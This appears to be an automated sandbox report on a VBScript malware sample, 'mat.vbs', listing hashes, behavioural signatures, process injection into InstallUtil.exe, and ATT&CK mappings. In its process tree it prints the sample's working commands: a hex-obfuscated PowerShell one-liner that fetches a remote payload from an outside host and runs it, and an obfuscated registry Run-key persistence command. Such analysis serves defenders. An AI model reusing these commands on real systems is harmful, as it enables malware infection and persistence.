2a09c15cbdf630ca762a9baa8cffd71fdeeb9195f1ed0bcf1aab4d46afdb13dc

General

Target

mat.vbs
Size

7KB
MD5

3f4f53a5a18c6b737d649b011dd6b9a1
SHA1

1848f72d0e23e721f3307a1ce2673f5d127b7032
SHA256

2a09c15cbdf630ca762a9baa8cffd71fdeeb9195f1ed0bcf1aab4d46afdb13dc
SHA512

97084c79f55bbd8f7d26df7b581a48cc81d9b5ef4b96cc26df505701b3f22bb179de6519157c83c8d00ef4b21f197fe7488ee40d7a1272bd3227113f692ae1ed

Score

10^/10

persistence

Malware Config

Signatures

Blacklisted process makes network request 1 IoCs

Processes:

Powershell.exe

flow pid process

5 1684 Powershell.exe

flow	pid	process
5	1684	Powershell.exe

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

Powershell.exe

description	pid	process	target process
PID 1684 wrote to memory of 460	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 460	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 460	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 460	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 460	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 460	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 460	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 112	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 112	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 112	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 112	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 112	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 112	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 112	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 112	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 112	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 112	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 112	1684	Powershell.exe	InstallUtil.exe
PID 1684 wrote to memory of 112	1684	Powershell.exe	InstallUtil.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Powershell.exe

description pid process target process

PID 1684 set thread context of 112 1684 Powershell.exe InstallUtil.exe

description	pid	process	target process
PID 1684 set thread context of 112	1684	Powershell.exe	InstallUtil.exe

Drops file in System32 directory 2 IoCs

Processes:

Powershell.exePowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	Powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	Powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\mat.vbs"	Powershell.exe

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

Powershell.exePowershell.execmd.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1684	1692	Powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1108	1692	Powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1912	1692	cmd.exe

Suspicious use of AdjustPrivilegeToken 71 IoCs

Processes:

Powershell.exePowershell.exeInstallUtil.exe

description	pid	process
Token: SeDebugPrivilege	1684	Powershell.exe
Token: SeDebugPrivilege	1108	Powershell.exe
Token: SeIncreaseQuotaPrivilege	1684	Powershell.exe
Token: SeSecurityPrivilege	1684	Powershell.exe
Token: SeTakeOwnershipPrivilege	1684	Powershell.exe
Token: SeLoadDriverPrivilege	1684	Powershell.exe
Token: SeSystemProfilePrivilege	1684	Powershell.exe
Token: SeSystemtimePrivilege	1684	Powershell.exe
Token: SeProfSingleProcessPrivilege	1684	Powershell.exe
Token: SeIncBasePriorityPrivilege	1684	Powershell.exe
Token: SeCreatePagefilePrivilege	1684	Powershell.exe
Token: SeBackupPrivilege	1684	Powershell.exe
Token: SeRestorePrivilege	1684	Powershell.exe
Token: SeShutdownPrivilege	1684	Powershell.exe
Token: SeDebugPrivilege	1684	Powershell.exe
Token: SeSystemEnvironmentPrivilege	1684	Powershell.exe
Token: SeRemoteShutdownPrivilege	1684	Powershell.exe
Token: SeUndockPrivilege	1684	Powershell.exe
Token: SeManageVolumePrivilege	1684	Powershell.exe
Token: 33	1684	Powershell.exe
Token: 34	1684	Powershell.exe
Token: 35	1684	Powershell.exe
Token: SeIncreaseQuotaPrivilege	1684	Powershell.exe
Token: SeSecurityPrivilege	1684	Powershell.exe
Token: SeTakeOwnershipPrivilege	1684	Powershell.exe
Token: SeLoadDriverPrivilege	1684	Powershell.exe
Token: SeSystemProfilePrivilege	1684	Powershell.exe
Token: SeSystemtimePrivilege	1684	Powershell.exe
Token: SeProfSingleProcessPrivilege	1684	Powershell.exe
Token: SeIncBasePriorityPrivilege	1684	Powershell.exe
Token: SeCreatePagefilePrivilege	1684	Powershell.exe
Token: SeBackupPrivilege	1684	Powershell.exe
Token: SeRestorePrivilege	1684	Powershell.exe
Token: SeShutdownPrivilege	1684	Powershell.exe
Token: SeDebugPrivilege	1684	Powershell.exe
Token: SeSystemEnvironmentPrivilege	1684	Powershell.exe
Token: SeRemoteShutdownPrivilege	1684	Powershell.exe
Token: SeUndockPrivilege	1684	Powershell.exe
Token: SeManageVolumePrivilege	1684	Powershell.exe
Token: 33	1684	Powershell.exe
Token: 34	1684	Powershell.exe
Token: 35	1684	Powershell.exe
Token: SeDebugPrivilege	112	InstallUtil.exe
Token: 33	112	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	112	InstallUtil.exe
Token: 33	112	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	112	InstallUtil.exe
Token: 33	112	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	112	InstallUtil.exe
Token: 33	112	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	112	InstallUtil.exe
Token: 33	112	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	112	InstallUtil.exe
Token: 33	112	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	112	InstallUtil.exe
Token: 33	112	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	112	InstallUtil.exe
Token: 33	112	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	112	InstallUtil.exe
Token: 33	112	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	112	InstallUtil.exe
Token: 33	112	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	112	InstallUtil.exe
Token: 33	112	InstallUtil.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

Powershell.exePowershell.exe

pid process

1684 Powershell.exe
1108 Powershell.exe
1684 Powershell.exe
1108 Powershell.exe
1684 Powershell.exe
1684 Powershell.exe

pid	process
1684	Powershell.exe
1108	Powershell.exe
1684	Powershell.exe
1108	Powershell.exe
1684	Powershell.exe
1684	Powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\mat.vbs"
1⤵
PID:336

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -ExecutionPolicy Bypass $nvldWsMbZGIAablZWoxK='24 54 62 6F 6E 65 3D 27 2A 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 27 2C 27 49 27 29 3B 73 61 6C 20 4D 20 24 54 62 6F 6E 65 3B 64 6F 20 7B 24 70 69 6E 67 20 3D 20 74 65 73 74 2D 63 6F 6E 6E 65 63 74 69 6F 6E 20 2D 63 6F 6D 70 20 67 6F 6F 67 6C 65 2E 63 6F 6D 20 2D 63 6F 75 6E 74 20 31 20 2D 51 75 69 65 74 7D 20 75 6E 74 69 6C 20 28 24 70 69 6E 67 29 3B 24 70 32 32 20 3D 20 5B 45 6E 75 6D 5D 3A 3A 54 6F 4F 62 6A 65 63 74 28 5B 53 79 73 74 65 6D 2E 4E 65 74 2E 53 65 63 75 72 69 74 79 50 72 6F 74 6F 63 6F 6C 54 79 70 65 5D 2C 20 33 30 37 32 29 3B 5B 53 79 73 74 65 6D 2E 4E 65 74 2E 53 65 72 76 69 63 65 50 6F 69 6E 74 4D 61 6E 61 67 65 72 5D 3A 3A 53 65 63 75 72 69 74 79 50 72 6F 74 6F 63 6F 6C 20 3D 20 24 70 32 32 3B 24 6D 76 3D 27 28 4E 27 2B 27 65 77 27 2B 27 2D 4F 27 2B 27 62 27 2B 27 6A 65 27 2B 27 63 27 2B 27 74 20 27 2B 20 27 4E 65 27 2B 27 74 2E 27 2B 27 57 27 2B 27 65 62 27 2B 27 43 27 2B 27 6C 69 27 2B 27 65 6E 74 29 27 2B 27 2E 44 27 2B 27 6F 77 27 2B 27 6E 6C 27 2B 27 6F 61 27 2B 27 64 27 2B 27 53 27 2B 27 74 72 27 2B 27 69 6E 67 28 27 27 68 74 74 70 73 3A 2F 2F 72 65 64 65 66 61 72 6D 61 70 61 63 68 65 63 6F 2E 63 6F 6D 2E 62 72 2F 6A 75 6C 68 6F 2F 32 38 6A 75 6C 68 6F 66 64 70 2E 6A 70 67 27 27 29 27 7C 49 60 45 60 58 3B 24 61 73 63 69 69 43 68 61 72 73 3D 20 24 6D 76 20 2D 73 70 6C 69 74 20 27 2D 27 20 7C 46 6F 72 45 61 63 68 2D 4F 62 6A 65 63 74 20 7B 5B 63 68 61 72 5D 5B 62 79 74 65 5D 22 30 78 24 5F 22 7D 3B 24 61 73 63 69 69 53 74 72 69 6E 67 3D 20 24 61 73 63 69 69 43 68 61 72 73 20 2D 6A 6F 69 6E 20 27 27 7C 4D';$jm=$nvldWsMbZGIAablZWoxK.Split(' ') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
1⤵
- Blacklisted process makes network request
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Drops file in System32 directory
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1684

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
2⤵
PID:460

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:112

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell $g='C:\Users\Admin\AppData\Local\Microsoft\mat.vbs';'Set-Item -Path HKCU:\Software\Micro@@oft\Window@@\CurrentVer@@ion\Run -Value $g'.replace('@@','s') |I`E`X
1⤵
- Drops file in System32 directory
- Adds Run key to start application
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1108

C:\Windows\system32\cmd.exe
cmd /c copy "C:\Users\Admin\AppData\Local\Temp\mat.vbs" "C:\Users\Admin\AppData\Local\Microsoft\" /Y
1⤵
- Process spawned unexpected child process
PID:1912

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Download Submit
memory/112-3-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/112-4-0x0000000000406A5E-mapping.dmp

Download
memory/112-5-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/112-6-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/336-1-0x00000000025C0000-0x00000000025C4000-memory.dmp

Filesize
16KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads